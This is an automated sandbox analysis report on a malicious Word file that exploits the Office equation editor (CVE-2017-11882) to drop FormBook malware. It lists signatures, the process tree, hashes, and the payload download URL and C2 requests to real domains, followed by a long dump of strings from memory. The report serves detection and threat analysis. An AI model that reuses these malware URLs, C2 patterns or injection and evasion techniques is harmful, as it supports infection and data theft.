
Analysis Report VOMAXTRADING.doc

Overview

General Information

Sample Name: VOMAXTRADING.doc
Analysis ID: 323039
MD5: 30244581b41accd77dab936571e0d87e
SHA1: 46ddb3fa250dfb4808c3a43f7846d7c643a4f325
SHA256: 2664162d0341d8e5cf1cf3a290b77406d87111e3c9ff3fcf3a4f0836d15d3afe
Tags: doc

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1776 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2372 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • skypound83892.exe (PID: 1520 cmdline: C:\Users\user\AppData\Roaming\skypound83892.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
      • skypound83892.exe (PID: 960 cmdline: C:\Users\user\AppData\Roaming\skypound83892.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • firefos.exe (PID: 2992 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe' MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
            • firefos.exe (PID: 2336 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
          • firefos.exe (PID: 2872 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe' MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
            • firefos.exe (PID: 2840 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
          • NAPSTAT.EXE (PID: 2016 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 172 cmdline: /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2804 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author
Source: 16.2.firefos.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 16.2.firefos.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.firefos.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 15.2.firefos.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 15.2.firefos.exe.400000.0.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: C:\Users\user\AppData\Roaming\skypound83892.exe, CommandLine: C:\Users\user\AppData\Roaming\skypound83892.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\skypound83892.exe, NewProcessName: C:\Users\user\AppData\Roaming\skypound83892.exe, OriginalFileName: C:\Users\user\AppData\Roaming\skypound83892.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2372, ProcessCommandLine: C:\Users\user\AppData\Roaming\skypound83892.exe, ProcessId: 1520
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 104.168.198.45, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2372, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2372, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: VOMAXTRADING.doc, Virustotal: Detection: 43%
Source: VOMAXTRADING.doc, ReversingLabs: Detection: 39%
Yara detected FormBook
Source: Yara match, File source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\skypound83892.exe, Joe Sandbox ML: detected
Source: 15.2.firefos.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.firefos.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.skypound83892.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\skypound83892.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe, File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe, File opened: C:\Users\user\
Source: global traffic, DNS query: name: sea-shared-5.masterns.com
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 104.168.198.45:80
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 104.168.198.45:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49170
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 26 Nov 2020 07:44:06 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade, Keep-Alive | Last-Modified: Thu, 26 Nov 2020 01:10:37 GMT | Accept-Ranges: bytes | Content-Length: 278528 | Vary: Accept-Encoding | Keep-Alive: timeout=5, max=10000 | Content-Type: application/x-msdownload
Source: global traffic, HTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1 | Host: www.opel-occasions-ales.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1 | Host: www.runwithit.media | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1 | Host: www.mycapecrusade.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 198.49.23.141
Source: Joe Sandbox View, ASN Name: HOSTWINDSUS
Source: Joe Sandbox View, ASN Name: GOOGLEUS
Source: global traffic, HTTP traffic detected: GET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: sea-shared-5.masterns.com | Connection: Keep-Alive
Source: C:\Windows\explorer.exe, Code function: 7_2_02933302 getaddrinfo,setsockopt,recv,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65885D3-1CF8-4E74-AA78-05F4F57053A0}.tmp
Source: global traffic, HTTP traffic detected: GET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: sea-shared-5.masterns.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1 | Host: www.opel-occasions-ales.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1 | Host: www.runwithit.media | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1 | Host: www.mycapecrusade.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown, DNS traffic detected: queries for: sea-shared-5.masterns.com
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000007.00000000.2138753603.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
